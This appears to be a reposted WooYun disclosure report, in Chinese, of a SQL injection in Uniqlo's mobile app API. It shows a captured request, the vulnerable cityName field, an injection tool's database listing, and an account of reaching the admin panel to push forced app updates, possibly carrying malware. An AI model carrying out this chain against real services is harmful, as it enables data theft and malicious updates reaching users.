mysql 主键 uniqo_优衣库某处SQL注入可导致移动平台被劫持
漏洞概要
缺陷編號(hào):WooYun-2014-073739
漏洞標(biāo)題:優(yōu)衣庫(kù)某處SQL注入可導(dǎo)致移動(dòng)平臺(tái)被劫持
相關(guān)廠商:優(yōu)衣庫(kù)
漏洞作者:winsyk
提交時(shí)間:2014-08-25 10:08
公開時(shí)間:2014-11-23 10:10
漏洞類型:用戶敏感數(shù)據(jù)泄漏
危害等級(jí):高
自評(píng)Rank:20
漏洞狀態(tài):未聯(lián)系到廠商或者廠商積極忽略
Tags標(biāo)簽:
漏洞詳情
披露狀態(tài):
2014-08-25: 積極聯(lián)系廠商并且等待廠商認(rèn)領(lǐng)中,細(xì)節(jié)不對(duì)外公開
2014-11-23: 廠商已經(jīng)主動(dòng)忽略漏洞,細(xì)節(jié)向公眾公開
簡(jiǎn)要描述:
不要在意這些細(xì)節(jié)
詳細(xì)說明:
閑著無聊,于是上優(yōu)衣庫(kù)看衣服,因?yàn)槭且苿?dòng)app瞎測(cè)試了一下,發(fā)現(xiàn)了多處注入問題,這里就簡(jiǎn)單說說吧。。
漏洞證明:
#漏洞發(fā)現(xiàn):通過抓包得到如下信息:
*****oreHome/axis*****
1
*****oreHome/axis*****
screenSize: 1080x1920
platform: android
model: MI
osversition: 4.4.2
clientVer: 2.2.0
carrier:
subSourceId: UnqA18
udid: 8648950202687412
macAddress: 15:f6:5a:**:**:**
protocolVer: 2.2.0
weblogid:
sourceId: UnqA18
accept-encoding: gzip, deflate
Content-Length: 101
Content-Type: application/x-www-form-urlencoded
Host: **.**.**.**
Connection: Keep-Alivenum=&longitude=121.385568&latitude=31.317182&isHotShop=&cityName=%E4%B8%8A%E6%B5%B7%E5%B8%82&keyword=
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
screenSize:1080x1920
platform:android
model:MI
osversition:4.4.2
clientVer:2.2.0
carrier:
subSourceId:UnqA18
udid:8648950202687412
macAddress:15:f6:5a:**:**:**
protocolVer:2.2.0
weblogid:
sourceId:UnqA18
accept-encoding:gzip,deflate
Content-Length:101
Content-Type:application/x-www-form-urlencoded
Host:**.**.**.**
Connection:Keep-Alivenum=&longitude=121.385568&latitude=31.317182&isHotShop=&cityName=%E4%B8%8A%E6%B5%B7%E5%B8%82&keyword=
對(duì)上述post字段,簡(jiǎn)單測(cè)了下發(fā)現(xiàn)cityName 字段存在注入。#2 漏洞證明:通過讀取信息得到如下表,具體信息就不貼了。
web application technology: PHP 5.4.0, Nginx
back-end DBMS: MySQL 5.0
[20:58:17] [INFO] fetching database names
[20:58:17] [INFO] the SQL query used returns 12 entries
[20:58:17] [INFO] resumed: "information_schema"
[20:58:17] [INFO] resumed: "father"
[20:58:17] [INFO] resumed: "mysql"
[20:58:17] [INFO] resumed: "performance_schema"
[20:58:17] [INFO] resumed: "push"
[20:58:17] [INFO] resumed: "push_android"
[20:58:17] [INFO] resumed: "sq_uniqlo"
[20:58:17] [INFO] resumed: "statistics"
[20:58:17] [INFO] resumed: "test"
[20:58:17] [INFO] resumed: "uniqlocms"
[20:58:17] [INFO] resumed: "yek_mob"
[20:58:17] [INFO] resumed: "yek_mob_media"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
webapplicationtechnology:PHP5.4.0,Nginx
back-endDBMS:MySQL5.0
[20:58:17][INFO]fetchingdatabasenames
[20:58:17][INFO]theSQLqueryusedreturns12entries
[20:58:17][INFO]resumed:"information_schema"
[20:58:17][INFO]resumed:"father"
[20:58:17][INFO]resumed:"mysql"
[20:58:17][INFO]resumed:"performance_schema"
[20:58:17][INFO]resumed:"push"
[20:58:17][INFO]resumed:"push_android"
[20:58:17][INFO]resumed:"sq_uniqlo"
[20:58:17][INFO]resumed:"statistics"
[20:58:17][INFO]resumed:"test"
[20:58:17][INFO]resumed:"uniqlocms"
[20:58:17][INFO]resumed:"yek_mob"
[20:58:17][INFO]resumed:"yek_mob_media"
通過讀取admin表,得到信息,登錄后臺(tái),這些都不是重點(diǎn)。#劫持用戶,登錄后臺(tái)的這些可以參考后臺(tái):
http://**.**.**.**/bugs/wooyun-2010-050662從后臺(tái)發(fā)現(xiàn)可以添加版本更新,這就好玩了。。
這里的推送,可以選擇“可選更新”、“強(qiáng)制更新”。簡(jiǎn)單發(fā)個(gè)圖,ios和android 用戶都可被劫持。。ios的話,就是指app store!
注意:這里的劫持不是普通的軟件劫持,而是實(shí)實(shí)在在的更新,這個(gè)時(shí)候如果你越獄了,我可以給你推送個(gè)已經(jīng)有病毒的軟件,讓你安裝,后果……而且,這個(gè)東西可以強(qiáng)制更新!對(duì)廠商對(duì)用戶來說都是個(gè)大風(fēng)險(xiǎn),可以用來強(qiáng)推其他廠商的軟件,這樣優(yōu)衣庫(kù)……
修復(fù)方案:
1、修復(fù)注入點(diǎn);2、對(duì)訪問后臺(tái)做控制。3、僅僅測(cè)試,未對(duì)后臺(tái)數(shù)據(jù)做任何下載行為……
漏洞回應(yīng)
廠商回應(yīng):
未能聯(lián)系到廠商或者廠商積極拒絕
評(píng)價(jià)
總結(jié)
以上是生活随笔為你收集整理的mysql 主键 uniqo_优衣库某处SQL注入可导致移动平台被劫持的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: java排序算法代码_Java实现八种排
- 下一篇: java中删除sqlite数据库语句_s